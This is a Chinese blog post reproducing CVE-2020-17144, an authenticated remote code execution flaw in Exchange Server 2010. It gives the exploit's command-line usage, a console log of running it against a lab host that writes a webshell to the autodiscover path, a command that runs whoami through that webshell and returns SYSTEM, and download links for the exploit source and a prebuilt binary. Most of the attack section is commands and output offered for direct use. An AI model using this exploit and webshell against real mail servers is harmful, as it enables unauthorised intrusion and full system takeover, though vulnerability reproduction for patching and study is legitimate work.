CVE-2020-17144 Exchange远程代码执行漏洞复现

CVE-2020-17144 Exchange远程代码执行漏洞复现

漏洞简介

漏洞是由程序未正确校验cmdlet参数引起。经过身份验证的攻击者利用该漏洞可实现远程代码执行。

该漏洞和 CVE-2020-0688 类似，也需要登录后才能利用，不过在利用时无需明文密码，只要具备 NTHash 即可。除了常规邮件服务与 OWA外，EWS接口也提供了利用所需的方法。漏洞的功能点本身还具备持久化功能。

影响版本

Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 31

EXP用法

条件: Exchange2010; 普通用户
默认用法(写webshell): CVE-2020-17144-EXP.exe mail.example.com user pass

执行命令 & 端口复用: 修改ExploitClass.cs

漏洞复现

C:Usersk8gege>CVE-2020-17144.exe 192.168.1.89 administrator K8gege520
BinaryFormatter
[+] Target: https://192.168.1.89/ews/Exchange.asmx
[+] User: administrator K8gege520
[+] Shell in https://192.168.1.89/autodiscover/Services.aspx, Wait for few minutes

连接webshell

C:Usersk8gege>Ladon WebShell aspx cd https://192.168.1.89/autodiscover/Services.aspx Ladon whoami

Load WebShellExec

nt authoritysystem

DownLoad

SRC：https://github.com/Airboi/CVE-2020-17144-EXP

BIN: https://raw.githubusercontent.com/k8gege/K8tools/master/CVE-2020-17114-EXP.rar

小密圈也可下载

参考

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144

https://mp.weixin.qq.com/s?__biz=MzI2NDk0MTM5MQ==&mid=2247483712&idx=1&sn=0b2cc3c9692f5c58a4eeb246d4b392fc&chksm=eaa5bb60ddd23276baf4cfd3fc59ca847c28f350c65ef98a17d49bc9944d653fad95dec4fd14&mpshare=1&scene=1&srcid=1209jtbQLVJIgr3VT0Ut1TM9&sharer_sharetime=1607483575995&sharer_shareid=dc9cecc79ba34e4bbb700a43a16153fd#rd
相关阅读:
梯度方向问题
 switchsharp
R语言学习笔记：sort、rank、order、arrange排序函数
 R语言学习笔记：choose、factorial、combn排列组合函数
 MySQL学习笔记：少用Null
Oracle学习笔记：11g服务介绍及哪些服务必须开启？
GreenPlum学习笔记：create or replace function创建函数
 Python学习笔记：出生日期转化为年龄
 Python学习笔记：import sys模块（argv、path、platform、exit）
Oracle学习笔记：wm_concat函数合并字段
原文地址：https://www.cnblogs.com/k8gege/p/14111835.html

CVE-2020-17144 Exchange远程代码执行漏洞复现

漏洞简介

影响版本

EXP用法

漏洞复现

连接webshell

DownLoad

参考